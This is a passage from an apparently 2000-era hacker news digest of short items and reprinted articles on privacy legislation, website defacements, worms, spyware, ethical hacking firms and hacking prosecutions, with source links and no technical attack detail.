       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by William Knowles
      The Mexican leftist Democratic Revolution Party (PRD) is trying to
      crack the password to a a secret list of beneficiaries of a
      controversial $100 billion bank bailout that followed a currency
      crisis in 1994 and 1995. Four of the five passwords that protect the
      data are known and they are working on the last one. the party has
      hired 'hackers' to help them with the task.
      
      Reuters - via Yahoo
      
      http://dailynews.yahoo.com/h/nm/20000620/wr/mexico_hackers_dc_1.html
      @HWA
      
 197.0 [HNN] June 21'00 Privacy Issues Get Attention In Congress 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Apocalyse Dow
      About 300 privacy bills are pending in both the House and Senate.
      While most appear to be election year pandering they are starting to
      attract attention. The debates are centering around the opt-out or
      opt-in methodologies of collecting personal information.
      
      Boston Globe - Computer News Daily
      
      http://199.97.97.16/contWriter/cnd7/2000/06/20/cndin/9395-0023-pat_nyt
      imes.html
      @HWA
      
      
 198.0 [HNN] June 21'00 More Speakers for H2K 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by macki 
      Hope 2000 has added a new round of speakers and panels in preparation
      for the July 14-16 conference in New York City.
      
      H2K
      
      http://www.h2k.net/panels.html
      @HWA
      
      
 
 199.0 [HNN] June 22'00 White House Supports P3P 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Scully 
      The White House has come out in support of the World Wide Web
      Consortium's Platform for Privacy Preferences Project standard. P3P
      will work within a web browser and interact with a web site
      automatically. The browser will follow the preferences set by the user
      and warn the user if the web site attempts to violate those
      preferences. Privacy advocates disagree and feel that the P3P standard
      will allow web sites even more access to to personal information than
      they have now. (It does sounds like another election year bull shit
      ploy, but we'll see.)
      
      The White House - Office of the Press Secretary.
      ZD Net
      Electronic Privacy Information Center - Pretty Poor Privacy: An
      Assessment of P3P and Internet Privacy
      
      http://usinfo.state.gov/cgi-bin/washfile/display.pl?p
      http://www.zdnet.com/zdnn/stories/news/0,4586,2591856,00.html
      http://www.epic.org/reports/prettypoorprivacy.html
      @HWA
      
      
 200.0 [HNN] June 22'00 FSA Calls Bank Security Weak 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Apocalyse Dow 
      The Financial Services Authority (FSA), the UK's financial services
      regulator, has told banks that they must take more care with their
      online security. The FSA said there was a high risk with new IT
      employees because adequate background checks where not being performed
      and that while banks tend to have reasonable perimeter security, they
      often found insufficient segregation between internal and external
      systems, as well as poor internal security in general.
      
      Newsbytes
      
      http://www.newsbytes.com/pubNews/00/150881.html
      @HWA
      
      
 201.0 [HNN] June 22'00 Nike.com Redirected 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench
      A group known as S-11 redirected the nike.com home page to a site
      calling for action at the World Economic Forum 2000 on Sept. 11-13 in
      Melbourne, Australia. Nike technicians have regained control of the
      site and have launched an internal investigation.
      
      Attrition.org - Mirror
      Associated Press - via Yahoo
      Nando Times
      
      http://www.attrition.org/mirror/attrition/2000/06/21/www.nike.com/
      http://dailynews.yahoo.com/h/ap/20000621/tc/nike_hackers_1.html
      http://www.nandotimes.com/technology/story/0,1643,500219236-500312244-
      501742874-0,00.html
      @HWA
      
      
 202.0 [HNN] June 22'00 Cybercafes labeled 'Electronic Heroin' 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench 
      A new regulation within China prevents Cybercafes from operating
      within 200 meters of schools forcing many to close. Police in Xiamen,
      in China's Fujian province, have shut down 45 Internet cafes in the
      city, The city's Public Security Bureau insisted it must increase its
      role as an "Internet policeman".
      
      The UK Register
      
      http://www.theregister.co.uk/content/1/11480.html
      @HWA
      
      
 203.0 [HNN] June 22'00 Freeware Available to Track Napster Users 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench 
      The release of Media Enforcer now puts the power of NetPD into the
      hands of everyone. This freeware application can track users, IP
      address, tracks traded and other information of both Napster and
      Gnutella users. Since the software can also be used to find MP3s the
      author insists on a personal email before releasing the full version.
      
      ZD Net
      Media Enforcer
      
      http://music.zdnet.com/features/enforcer/?chkpt
      http://mediaenforcer.tripod.com/enforcer/index.html
      @HWA
      
      
 204.0 [HNN] June 22'00 ECTF labeled Cyber-Mod Squad 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Space Rogue 
      The Electronic Crimes Task Force, a collaboration of local, state and
      national law enforcement groups is headed by the New York office of
      the Secret Service has been called a 240 person "cyber-mod squad". It
      would appear however that the group deals mostly with cloned cell
      phones, identity thefts and stolen credit cards with an actual
      cybercrime thrown in here and there. (Just because a criminal uses the
      Internet does not make it a cybercrime.)
      
      Computer World
      
      http://www.computerworld.com/cwi/story/0,1199,NAV47_STO45927,00.html
      @HWA      
      
      
 205.0 [HNN] June 22'00 Eleven Story Tall Tetris Game 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Lady Sharrow 
      Definitely a hardware hack if there ever was one. Members of
      Technology House at Brown University created La Bastille,
      an eleven story Tetris game. It contains eleven custom-built circuit
      boards, a twelve-story data network, a personal computer running
      Linux, a radio-frequency video game controller, and over 10,000
      Christmas lights, La Bastille transforms Brown's fourteen-story
      Sciences Library into a giant video display which allows by standers
      to play a game of Tetris which can be seen for several miles.
      
      Tech House
      
      http://www.techhouse.org
      @HWA
 
 206.0 [HNN] June 23'00 DMCA Hearings Held By US Copyright Office 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by Weld Pond 
      The US Copyright office has been holding hearings regarding exemptions
      to the Section 1201 ban on circumvention of access control
      technologies, enacted by the Digital Millennium Copyright Act in 1998.
      This prohibition on circumvention becomes effective on October 28,
      2000. In the meantime, the Copyright Office will hold hearings to
      determine whether there are particular classes of copyrighted works
      that shall be exempted from the prohibition due to the inability of
      users to use the works in a noninfringing way.
      
      Cryptome
      US Copyright Office
      
      http://cryptome.org/dmca-hearings.html
      http://www.loc.gov/copyright/1201/anticirc.html
      @HWA
      
      
 207.0 [HNN] June 23'00 COPA Appeal Rejected!
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
      
      contributed by Weld Pond
      The 3rd U.S. Circuit Court of Appeals in Philadelphia has upheld lower
      court rulings that say that the Child Online Protection Act of 1998 is
      unconstitutional. The three judge panel said in a rather scathing
      opinion that the measure was so unconstitutionally broad it affected
      even non-pornographic websites. The Justice Department still has the
      ability to appeal to the Supreme Court, get the case remanded for
      trial, or give up.
      
      Wired
      US Courts - Judges decision
      
      http://www.wired.com/news/politics/0,1283,37171,00.html
      http://pacer.ca3.uscourts.gov/recentop/week/991324.txt
      @HWA
      
 208.0 [HNN] June 23'00 Mitnick Back In Court 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by macki 
      On Monday June 26 Kevin will head back to court for a clarification of
      the terms of his bail. At issue are the terms "consultant or advisor"
      which are mentioned within Kevin's bail conditions as being activities
      that he is prohibited to do. Kevin feels that giving talks to various
      groups, including the US Senate, does not violate this provision.
      
      FREE KEVIN
      
      http://www.freekevin.com
      @HWA
      
 209.0 [HNN] June 23'00 Security Glitch Brings Lawsuit 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by renderman 
      An Edmonton man found a way to beat the odds. Zues Yaghi found a
      glitch in the programming of certain slot machines. The manufacturer,
      WMS Gaming Inc. of Chicago, has launched a $10-million lawsuit against
      him. (Why does this reaction sound like that of any one of a number of
      security glitches and bugs found in the computer security world?
      Security by obscurity does not work. Of course with Defcon just around
      the corner I'm sure a lot of people would like to know what this
      glitch is.)
      
      Edmonton Journal
      
      http://www.edmontonjournal.com/stories1/000622/4325404.html
      @HWA
      
 210.0 [HNN] June 23'00 UAE Files Charges Against British Worker 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by William Knowles 
      A British man working in the United Arab Emirates has been accused of
      breaking into various computer systems and 'damaging the economy'. The
      man activities had been traced by the Emirates Telecommunications Corp
      (Etisalat) network security staff. UAE has no specific laws regarding
      computer attacks but that a charge of 'damaging the economy' carries a
      maximum penalty of ten years.
      
      Reuters - via Excite
      
      http://news.excite.com/news/r/000622/04/net-emirates-hacker-dc
      @HWA
      
 211.0 [HNN] June 23'00  Feedback on Female Hackers 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by Weld Pond 
      ABC received so much feedback from its original story about women in
      the underground that it has decided to publish some of the those
      comments which for the most part are pretty good.
      
      ABC News
      
      http://abcnews.go.com/sections/tech/DailyNews/hackerfeedback_000619.ht
      ml
      @HWA
      
 212.0 [HNN] June 23'00 Online Retailers Don't Provide Adequate Security 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Apocalyse Dow 
      A study entitled "Top of the E-Class: Ranking and Best Practices of
      over 170 Web Sites" found that on-line retailers fail to provide
      shoppers with adequate security and privacy protection. The report,
      commissioned for Ryerson Polytechnic University's Center for the Study
      of Commercial Activity , found a full third of retailers did not even
      meet minimum security standards
      
      The Globe and Mail
      
      http://www.globetechnology.com/archive/gam/News/20000622/RSECU.html
      @HWA
      
 213.0 [HNN] June 23'00 Better to Be Scared Than Sorry? 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by newbie 
      While administrators and users need to treat all reports of every
      threat seriously this article seems to suggest that crying wolf is an
      itself acceptable. It should be the responsibility of the security
      industry to verify that its information is absolutely correct before
      informing the media. Creating a nationwide cyber panic over a threat
      that does not exist is not helpful, does not heighten awareness, and
      does not increase security. Instead it wastes time, desensitizes
      users, and costs corporations money.
      
      Computer World - via CNN
      
      http://www.cnn.com/2000/TECH/computing/06/21/security.warning.idg/inde
      x.html
      @HWA
      
 214.0 [HNN] June 23'00 Snooping Enters the Mainstream 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench
      With the low cost availability of software that allows keystroke
      recording many people are finding just how easy it is to snoop on
      someone else. Spyware is becoming all the rage with spouses who
      suspect cheating, parents who suspect anything, and employers who want
      to check up on their employees.
      
      NY Times
      
      http://www.nytimes.com/library/tech/yr/mo/circuits/articles/22pete.htm
      l
      @HWA
 
 215.0 [HNN] June 26'00 24,000 Credit Card Numbers At Risk
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
      
      contributed by William Knowles 
      A pioneering internet service provider in England has become the
      victim of an online attack. Redhotant lost its entire customer
      database which included names, addresses, passwords and credit card
      numbers. The ISP has denied that the break in has occurred but a
      security consultant has told The Times UK, that he was able to access
      the Database.
      
      The Times UK
      
      http://www.the-times.co.uk/news/pages/sti/2000/06/25/stinwenws01002.ht
      ml
      @HWA
      
 216.0 [HNN] June 26'00  Russians Introduce Cyber Doctrine 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by William Knowles 
      President Vladimir Putin's powerful Security Council has approved an
      'information security doctrine' to strengthen the government's role in
      monitoring information flow within Russia. The unpublished doctrine is
      supposed to protect journalists rights, crack down on cybercrime and
      support the telecom industry.
      
      Associated Press - via The Age
      
      http://www.theage.com.au/breaking/0006/24/A30741-2000Jun24.shtml
      @HWA
      
 217.0 [HNN] June 26'00 Mitnick In Court Today 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Sarge 
      Kevin Mitnick will return to court today in an effort to clarify his
      bail conditions. When released from jail earlier this year he was told
      that he could not 'consult' on computer related matters. It is hoped
      that he will be able to convince the judge that lectures and writing a
      column for an online magazine do not constitute 'consulting'.
      
      Reuters - via ZD Net
      
      http://www.zdnet.com/zdnn/stories/news/0,4586,2593948,00.html
      @HWA
      
 218.0 [HNN] June 26'00 More Info Reported Missing At Los Alamos 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by Apocalyse Dow 
      An audit of classified information at Los Alamos turned up two
      10-year-old floppy disks missing. The disks where found the next day.
      The audit also found an equipment closet unlocked inside a secure
      room. The Department of Energy will be investigating both events. (Ten
      year old floppies? Hello? Floppies are only valid for approximately
      six months.)
      
      APB News
      
      http://www.apbnews.com/newscenter/breakingnews/2000/06/24/losalamos062
      4_01.html
      @HWA
      
 219.0 [HNN] June 26'00 The HoneyNet Research Project 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Al 
      A pretty unconventional research paper was recently released which
      focuses on an examination of black-hat activity following the
      compromise of a honeynet setup. This paper is the result of the work
      and research of the Honeynet Project,which shows detailed keystroke
      logs of everything that these unsuspecting blackhats did to hack and
      maintain root on the system, as well as full transcripts of their IRC
      sessions while they were being watched. The Honeynet Project estimates
      that over 370 other systems were compromised in this two-week period
      by the same individuals.
      
      Security Focus
      
      http://www.securityfocus.com/frames/?focus
      @HWA
      
 220.0 [HNN] June 26'00 Cell Phones And Driving Don't Mix 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Apocalyse Dow 
      Singapore, known for its strict anti-littering and anti-chewing gum
      laws, now plans to jail motorists who hold mobile phones to their ears
      while driving. Violators face a six-month jail term for a first
      offense or a S$1,000 ($588 U.S.) fine, or both, and a driving ban. A
      second offense would double the fine and jail term. (Hang up and
      drive.)
      
      ZD Net
      
      http://www.zdnet.com/zdnn/stories/newsbursts/0,7407,2593947,00.html?ch
      kpt
      @HWA
      
 221.0 [HNN] June 26'00 New Viruses Attack The Soul 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by Code Kid
      It is no longer a question of what a virus does but how it gets the
      user to execute it. How well the software social engineers the user
      into executing the email attachment is the critical step in getting an
      email virus to propagate widely.
      
      ZD Net
      
      http://www.zdnet.com/zdnn/stories/news/0,4586,2593514,00.html
      @HWA
      
 222.0 [HNN] June 26'00 Traditional Hackers Upset Over Use of Term 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by Code Kid 
      Hacker, cracker, criminal, we have heard it all before but for some
      reason this angle still gets press. hackers are upset about the use
      the term 'hacker' to describe criminals. (Yawn, now there is up to the
      minute reporting for you.)
      
      Australian Financial Review
      
      http://www.afr.com.au/reports/20000620/A19851-2000Jun19.html
      @HWA
 
 223.0 [HNN] June 27'00 Oracle Admits to Spying on Microsoft 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by ted 
      The second largest software company in the world has admitted that it
      hired a detective agency to investigate the allies of the largest
      software company in the world. In a statement released yesterday
      Oracle admitted that it hired Investigative Group International Inc.
      to expose certain industry trade groups as puppets of Microsoft.
      
      Wall Street Journal
      The Register UK
      
      http://interactive.wsj.com/articles/SB962146554881934536.htm
      http://www.theregister.co.uk/content/1/11637.html
      @HWA
      
 224.0 [HNN] June 27'00  FBI To Investigate Stages Worm 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by Apocalyse Dow 
      After 12 days the Stages worm has caused many headaches for
      administrators and ISPs. The FBI has announced that they are now
      starting an investigation into who and where the worm came from.
      Initially they believe that the virus/worm originated in Argentina.
      When the virus/worm is triggered, it appears to activate links to
      pornographic sites and changes the home page of the victims' Internet
      Explorer browser to a porn site.
      
      Newsbytes
      Stages - via Computer Associates
      
      http://www.newsbytes.com/pubNews/00/151173.html
      http://www.ca.com/virusinfo/
      @HWA
      
 225.0 [HNN] June 27'00  Mattel Will Remove Spyware 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by Renderman 
      Mattel has announced that they will be releasing a tool to uninstall
      spyware included with many of their children titles such as 'Reader
      Rabbit', 'Arthur' and 'Little Bear'. The software, known as
      "Broadcast," would send a product identification number and some
      technical information to Mattel and then download advertising for
      products targeted at the user. Strangely enough this spyware does not
      fall under COPPA because Mattel is not a web-site or on-line service,
      however Mattel decided to stop using the software anyway. (Well,
      that's mighty nice of them.)
      
      ABC News
      url vanished!
      
      @HWA

 226.0 [HNN] June 27'00 Russia Accuses Lithuanian of Hacking For The US 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Jonas.Bijunas 
      Russia's FSB domestic security service said on Monday it had exposed
      and detained a Lithuanian on charges he spied for the United States by
      breaking into its computer systems. The FSB claimed that the spy
      admitted to the acts and that the goal was to penetrate information
      systems to determine their structure, defensive measures, and to
      create holes for later use.
      
      Reuters - via AltaVista Live
      
      http://live.altavista.com/scripts/editorial.dll?ei
      @HWA
      
 227.0 [HNN] June 27'00 BSA Settles With 20 Companies  
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Apocalyse Dow 
      The Business Software Alliance has announced 20 settlements with
      companies it found to be copying programs or using unlicensed copies.
      The settlements will result in more than $2.4 million in fines to be
      paid to BSA. Details of the settlements will be made over the next
      week. (Milk it for all its worth)
      
      ABC News
      e-commerce Times
      
      http://abcnews.go.com/sections/tech/DailyNews/piracy000627.html
      http://www.ecommercetimes.com/news/articles2000/000627-5.shtml
      @HWA
      
 228.0 [HNN] June 27'00 UAE Telecom Firm Will Prosecute 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by Code Kid
      United Arab Emirates telecomunications firm Etisalat has vowed to
      prosecute anyone who abuses the country's Internet system. Lee Alan
      Ashurst, 21, of Manchester, England, is suspected by Etisalat
      officials of breaking into the systems and causing service disruptions
      earlier this month, has denied the accusations and said he had filed
      lawsuits for defamation and damages against Etisalat. Reuters - Yahoo
      
      http://dailynews.yahoo.com/h/nm/20000628/wr/emirates_hacker_dc_2.html
      @HWA

 229.0 [HNN] June 28'00 Oracle Admits to Spying on Microsoft 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by ted 
      The second largest software company in the world has admitted that it
      hired a detective agency to investigate the allies of the largest
      software company in the world. In a statement released yesterday
      Oracle admitted that it hired Investigative Group International Inc.
      to expose certain industry trade groups as puppets of Microsoft.
      
      Wall Street Journal
      The Register UK
      
      http://interactive.wsj.com/articles/SB962146554881934536.htm
      http://www.theregister.co.uk/content/1/11637.html
      @HWA
      
 230.0 [IND] UK: White-hat Hacker Engaged In Black Arts
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      May 23 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_052300a_j.shtml      
      
      5/23/00
      UK: White-hat Hacker Engaged In Black Arts
      
      MICK is an ethical hacker. There is not much more we can say about him, 
      not even his real name, except that he lives in the UK and is a frontline 
      fighter in the escalating war against cybercrime.

      Mick is employed by IBM Global Services as a "white-hat" hacker. His days 
      are spent trying to break into the computer networks of IBM's clients, 
      either remotely on the Internet or in disguise by infiltrating the 
      client's building and hacking into the computer system on site.

      Only one person within the target organisation, usually a senior 
      executive, will know Mick's identity. He is armed with a waiver from 
      prosecution should the mission be successful in exposing flaws in a 
      company's computer security.

      Mick says he used to write security products, such as fire walls for 
      keeping intruders and viruses out of companies' computer networks, before 
      moving on to IBM's ethical hacker team. "IBM thought it would be good to 
      have somebody who makes security, break security," he says.

      Mick says his work is vital in protecting companies, and ultimately their 
      customers, from cybercrimes such as viruses, the distributed denial of 
      service (DDOS) attacks that hit Yahoo! and other Internet sites earlier 
      this year and credit card fraud.

      His enemies range from kids messing about with virus-writing tools 
      available over the Internet to disgruntled employees and seriously 
      intelligent "black hat hackers" out to do maximum damage to a company 
      through its computers.

      The FBI and Interpol have identified a growing trend in unethical 
      companies and countries employing black-hat hackers to damage rival 
      companies and even countries. "There is definitely information warfare 
      going on," Mick says.

      One of the biggest problems faced by providers of computer security 
      services is an understandable reluctance on the part of companies to admit 
      their security flaws or report breaches. Mick says that the DDOS attacks 
      and this month's ILOVEYOU virus, which both cost industry billions of 
      pounds, have raised awareness and budgets for computer security. Mick says 
      UK companies must embrace computer security by putting comprehensive 
      policies in place and regularly updating and testing defences. "In the US, 
      security has a great profile from CEO down to the cleaner," he says. "The 
      UK has a lot to learn, but it is learning very fast."

      Jonathon Fornaci, chief executive of AtomicTangerine, an Internet 
      consultancy firm spun out of the Stanford Research Institute, says 
      computer security is "critical" as companies embrace e-business. He says 
      governments around the world are tackling the problem, but have admitted 
      that they are virtually powerless to protect companies and consumers from 
      cybercrime. He says it is up to companies to protect themselves.

      Mick agrees: "There is a limit to what the Government can do. You can't 
      spend hundreds of thousands of pounds of resources to catch somebody who's 
      doing minimal damage. You don't take the whole Hampshire police force to 
      track down a jaywalker."

      Fornaci believes that companies also share a "social and moral obligation" 
      to employ sound computer security systems because of the trend for hackers 
      and virus writers to use companies' websites as staging posts for attacks 
      on other companies.

      By Clive Mathieson. (c) Times Newspapers Ltd, 2000. THE TIMES 20/05/2000 
      P31 
      
      @HWA
       
231.0  [IND] India: Licensed To Bill - `Ethical Hackers' Get Paid To Crack E-security.
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      May 23 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_052300b_j.shtml      
      
      5/23/00
      India: Licensed To Bill - `Ethical Hackers' Get Paid To Crack E-security.
      
      MUMBAI: A new breed of hackers is on the loose. They are not the ones who 
      have been giving corporate IT managers nightmares so far - - teenagers 
      sitting in some dark room, attacking corporate computer systems or 
      stealing vital data.

      The new species carries a valid `double oh' license. They are fully 
      authorised to hack into companies, ranging from banks to e-commerce 
      organisations. Reason? To thoroughly check system security and plug 
      relevant problems.

      Many of them are pioneers in a shadowy business that may seem more like a 
      scene from the Hollywood blockbuster `The Net,' where Sandra Bullock falls 
      victim to a group of expert computer hackers, than reality.

      Global professional services firm Ernst & Young actually gets paid for 
      hiring out their `ethical hackers' to large companies, mostly in the 
      banking, insurance, B2B and B2C arenas.

      With the proliferation of dotcoms here, the scene is merely warming up, 
      with the web becoming an even more attractive playground for hackers. 
      Mushrooming e-commerce has meant an increasing volume of sensitive data, 
      specially financial data, getting transferred over the Internet. As a 
      result, a hacker attack is no longer a mere annoyance for companies. It 
      could lead to maor financial loss. "75 per cent of the hacking that we 
      encounter is from within the same organisation that we are employed to 
      check," states Ernst & Young (E&Y) national director Sunil Chandiramani. 
      "That is a frightening statistic," he adds.

      A member of the Cybercop committee of the NASSCOM, Mr Chandiramani is also 
      in the working committee of the Securities and Exchange Board of India 
      (SEBI) on Internet trading surveillance and enforcement related issues. 
      Says Mr Chandiramani:"Most times, we can get into nine of the 10 companies 
      via the Internet and then come back with some souvenir to show that we 
      were there.".

      E&Y's `eXtreme hacking' is a cutting edge tool and methodology adopted by 
      the firm to defend sites and provide the necessary security solutions. The 
      firm also conducts training sessions to enable corporates double-check 
      their security system and familiarise them with network-based attack and 
      penetration exploits, that hackers may use against their networks.

      Providing security solutions for a complex world may not be an easy task 
      for it is necessary to assess, architect and implement solutions to 
      protect vital information resources. Hackers have gained prominence for 
      their ability to penetrate hard-to-crack computer centres by exposing an 
      unnoticed vulnerability or by making a clear anti-authority statement and 
      even in some cases, re-designing the front page of the web site.

      As for the kind of perpetrators? According to a global information 
      security survey conducted by E&Y, 24.8 per cent of the threats facing 
      organisations today come from hackers and 13.9 per cent of the hacking 
      incidents are actuated by competitors. While 7.5 per cent are authorised 
      users of the system, an equally high number of 6.2 per cent are contract 
      workers and consultants. Unauthorised users account for 20.8 per cent of 
      cyber crimes, the survey points out.

      Though security concerns are "very new here (in India)" with e-commerce 
      merely testing the waters here, attacks into high profile databases are on 
      the increase and are expected to bring to boil a $4 billion content 
      security market in the next couple of years, according to industry 
      estimates.

      As Mr Chandiramani states, "We don't just go to the firewall and prove 
      that we can break in, but we go into the main computers itself. At times, 
      we deploy staff to get into the EPBX system to get telephone numbers," he 
      said adding, "it is not hard to convince companies of their security 
      loopholes once we have managed to hack into their system."

      That is not to say that companies have not deployed solutions to counter 
      hacking. Among several corporate houses, Unilever has corporate IT 
      security policies and standards that are applied around the globe, both 
      within the organisation and with their close business associates. ICICI, 
      too, has an established security organisation structure and has developed 
      IT security policy and procedures which are in place.

      While Hindustan Lever Limited undertakes regular attack and penetration 
      testing, Sprint RPG India Limited has developed policies and procedures 
      for maximising the effectiveness of their IT processes.

      With borderless transactions getting to be the norm, India will be as 
      vulnerable as any other country to intrusions of this nature. Moreover, 
      with electronic records becoming legally acceptable, there is a growing 
      threat that companies could stand to lose valuable information if adequate 
      care is not taken of the health of the media on which the records are 
      stored.

      By Amrita Nair-Ghaswalla. (c) 2000 The Times of India Group. TIMES OF 
      INDIA 20/05/2000 
      
      @HWA

  232.0 [IND] Hackers Shoot, Score On NHL Web Site
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
      May 25 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_052500a_j.shtml     
      
      5/25/00
      Hackers Shoot, Score On NHL Web Site
      By Martin Stone, Newsbytes
      NEW YORK, NEW YORK, U.S.A.,
      25 May 2000, 6:47 AM CST
      
      Officials of the National Hockey League (NHL) and FBI investigators are 
      reportedly attempting to find the culprit or culprits who disabled the 
      league's official Web site in the midst of the Stanley Cup playoffs.

      An Associated Press report today said it remained uncertain whether 
      hackers cross-checked the site at http://www.NHL.com on Sunday with a 
      Distributed Denial of Service (DDoS) attack, but the results seem similar 
      to the so-called "smurf" invasions that brought down Yahoo, eBay, eTrade, 
      CNN, Amazon.com and other sites in February.

      The league said it had filed a formal complaint with the FBI in addition 
      to seeking help from security firms to track down the hackers.

      A league official told AP, "Someone was flooding the pipeline with bogus 
      requests through distributed PCs. The whole system was overloaded. But the 
      intranet was not compromised," he said, referring to the NHL's internal 
      Web network.

      The spokesman confirmed the site is still experiencing "spotty service", 
      the report said. 
      
      @HWA
      
 233.0 [IND] Computer whiz alters high school's grades
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
      May 25 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_052500b_j.shtml     
      
      5/25/00
      Computer Whiz Alters High School's Grades
      
      Associated Press -
      
      POCATELLO, Idaho _ Someone allegedly hacked into the computer system at
      Highland High School and changed students' grades.
      
      http://www.spokane.net:80/news-story-body.asp?Date=052000&ID=s804878&cat= 
      
      Computer whiz alters high school's grades
      
      
      Associated Press - 
      
      
      "We've had some computer espionage from students," Pocatello School 
      District technology coordinator Bob England said Thursday. "Altering 
      grades. I believe the police are dealing with it."

      England said the hacker used the district network and software, somehow 
      copied teachers' passwords and logged onto the system.

      Highland Principal Jeff Taylor said disciplinary action would be taken
      and that administrators were "treating it as a serious action against 
      school policy."
      
      
      @HWA

      
 234.0 [HNN] Jun 29'00 Australian Tax Office Allegedly Compromised 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by David 
      Australian Federal Police have identified who they say is the person
      who stole confidential details of thousands of businesses from a
      government GST website. Several Australian business reported getting
      strange anonymous emails that contained business phone and fax number
      as well as bank account details. The site was set up to allow
      companies to submit their banking details and other information to
      become accredited suppliers of GST information and assistance
      packages. The perpetrator told a reporter that he didn't hack or crack
      into the server, he stumbled upon the information while surfing due to
      a complete lack of security. He thought he should tell the companies
      involved which is why he sent the email. The security hole has been
      blamed on a poorly designed CGI script.
      
      The Age
      news.com.au
      ZD Net Australian
      Fairfax IT
      Sydney Morning Herald
      
      http://www.theage.com.au/breaking/0006/29/A40793-2000Jun29.shtml
      http://www.news.com.au/common/story_page/0,4057,871934%255E2,00.html
      http://www.zdnet.com.au/zdnn/stories/zdnn_display/au0003700.html
      http://www.it.fairfax.com.au/breaking/20000629/A40837-2000Jun29.html
      http://www.smh.com.au/news/0006/29/update/news11.html
      @HWA
      
 235.0 [HNN] Jun 29'00 AOL Tells FCC That IM Security Is Top Priority 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by Evil Wench 
      In response to the Federal Communications Commission's inquiry on
      instant messaging, AOL said it supports the interoperability of
      instant messaging (IM) software but that it must make the privacy and
      security of instant messages the company's top priority until
      standards can be developed. Reuters - via Yahoo
      
      http://dailynews.yahoo.com/h/nm/20000627/en/online-messaging_1.html
      @HWA
      
 236.0 [HNN] Jun 29'00 McCain Still Pushing for Filtering 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by Evil Wench 
